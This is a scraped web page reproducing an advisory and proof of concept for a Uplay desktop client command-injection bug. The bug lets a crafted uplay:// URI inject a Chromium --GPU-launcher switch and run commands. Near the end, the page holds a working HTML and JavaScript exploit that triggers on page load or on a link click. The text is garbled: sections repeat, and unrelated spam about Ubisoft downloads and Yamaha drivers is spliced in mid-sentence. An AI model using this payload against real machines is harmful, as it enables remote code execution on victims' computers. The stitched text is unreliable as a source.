Sep 20, 2018 # The Uplay desktop client does not properly validate user-controlled data passed to its custom # uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF) # integrated within the Uplay client, allowing for arbitrary code execution. # Installing Uplay registers the following custom uplay protocol handler.
# Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 – Remote Code Execution
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A
# Date: 2018-09-01
# Exploit Author: Che-Chun Kuo
# Vulnerability Type: URI Parsing Command Injection
# Vendor Homepage: https://www.ubisoft.com/en-us/
# Software Link: https://uplay.ubi.com/
# Version: 63.0.5699.0
# Tested on: Windows, Microsoft Edge
# Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018
# CVE: N/A
# Vulnerability
# The Uplay desktop client does not properly validate user-controlled data passed to its custom
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF)
# integrated within the Uplay client, allowing for arbitrary code execution.
# The Uplay desktop client does not properly validate user-controlled data passed to its custom
# uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF)
# integrated within the Uplay client, allowing for arbitrary code execution.
# Installing Uplay registers the following custom uplay protocol handler:
# HKEY_CLASSES_ROOT
# uplay
# (Default) = “URL:uplay Protocol”
# URL Protocol = “”
# DefaultIcon
# (Default) = “upc.exe”
# Shell
# Open
# Command
# (Default) = “C:Program Files (x86)UbisoftUbisoft Game Launcherupc.exe” “%1″
# HKEY_CLASSES_ROOT
# uplay
# (Default) = “URL:uplay Protocol”
# URL Protocol = “”
# DefaultIcon
# (Default) = “upc.exe”
# Shell
# Open
# Command
# (Default) = “C:Program Files (x86)UbisoftUbisoft Game Launcherupc.exe” “%1″
- Welcome to the official website for Ubisoft, creator of Assassin's Creed, Just Dance, Tom Clancy's video game series, Rayman, Far Cry, Watch Dogs and many others. Learn more about our breathtaking games here!
- Oct 26, 2020 Introducing Ubisoft Connect – The Future of our Desktop App October 21, 2020, 4:00 PM Ubisoft Connect links players and services on Ubisoft games across all platforms, and it’s launching on.
# The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution:
‘uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘
# When a victim opens this URI, the string is passed to the Windows ShellExecute function.
# Microsoft states the following: “When ShellExecute executes the pluggable protocol handler with a
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will
# be interpreted as part of the command line. This means that if you use C/C++’s argc and
# argv to determine the arguments passed to your application, the string may be broken
# across multiple parameters.”
# Microsoft states the following: “When ShellExecute executes the pluggable protocol handler with a
# string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will
# be interpreted as part of the command line. This means that if you use C/C++’s argc and
# argv to determine the arguments passed to your application, the string may be broken
# across multiple parameters.”
# “Malicious parties could use additional quote or backslash characters to pass additional command
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on
# the command line could come from malicious parties, and carefully validate them.”
# line parameters. For this reason, pluggable protocol handlers should assume that any parameters on
# the command line could come from malicious parties, and carefully validate them.”
# The Uplay desktop client does not properly validate user-controlled data. Run dmg on chrome os 7. An attacker can inject
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the
# command line with a quote character and inserts a new switch called –GPU-launcher. Since the
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported.
# The –GPU-launcher switch provides a method to execute arbitrary commands. The following string shows
# the final command, which opens the Windows command prompt and executes the whoami program.
# certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the
# command line with a quote character and inserts a new switch called –GPU-launcher. Since the
# Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported.
# The –GPU-launcher switch provides a method to execute arbitrary commands. The following string shows
# the final command, which opens the Windows command prompt and executes the whoami program.
“C:Program Files (x86)UbisoftUbisoft Game Launcherupc.exe” “foobar” –GPU-launcher=”cmd /K whoami &” –”
# Attack Scenario
# The following attack scenario would result in the compromise of a victim’s machine with the vulnerable
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge
# is trying to open “UPlay launcher”. After the user gives consent, the vulnerable application runs,
# resulting in arbitrary code execution in the context of the current process.
# The following attack scenario would result in the compromise of a victim’s machine with the vulnerable
# Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a
# specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge
# is trying to open “UPlay launcher”. After the user gives consent, the vulnerable application runs,
# resulting in arbitrary code execution in the context of the current process.
The Ubisoft Uplay Desktop App Download
# This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape
# illegal characters before passing the URI to the protocol handler.
# opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape
# illegal characters before passing the URI to the protocol handler.
B) If you are using DME-N Network Driver V1.1.3 or V1.1.2. When updating the driver, uninstall the driver by double-clicking 'setup.exe' for the latest driver, restart your computer, and then install the latest driver. If Yamaha software does not operate properly, uninstall and install the software again. Yamaha dme driver. The USB-MIDI Driver is for use with Studio Manager V2 Host, Editor, PM1D Manager and DME Designer. Be sure to use the latest versions of the software available on this Yamaha Pro Audio site. V1.2.4 works on Windows 10 only. For other Windows, use V1.2.3 or earlier. The Network Driver must be installed on your computer for controlling the DME, DSP5D, M7CL, or LS9 via Ethernet.
# After Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables
# before the –GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService
# requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear.
# It should be noted, this UAC prompt doesn’t prevent command execution from occurring.
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No),
# command execution will still occur once the code that passes the –GPU-launcher switch
# to the CEF is triggered within upc.exe.
# before the –GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService
# requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear.
# It should be noted, this UAC prompt doesn’t prevent command execution from occurring.
# Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No),
# command execution will still occur once the code that passes the –GPU-launcher switch
# to the CEF is triggered within upc.exe.
# Proof of Concept
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge.
# The first method triggers when the webpage is opened. The second method triggers when the
# hyperlink is clicked by a user.
# The following POC provides two avenues to trigger the vulnerability within Microsoft Edge.
# The first method triggers when the webpage is opened. The second method triggers when the
# hyperlink is clicked by a user.
POC:
[su_quote]
[su_quote]
<!doctype html>
<a href=’uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘>ubisoft uplay desktop client rce poc</a>
<a href=’uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘>ubisoft uplay desktop client rce poc</a>
Download Uplay Pc
<script>
window.location = ‘uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘
</script>
window.location = ‘uplay://foobar” –GPU-launcher=”cmd /K whoami &” –‘
</script>
Ubisoft App Download Pc
[/su_quote]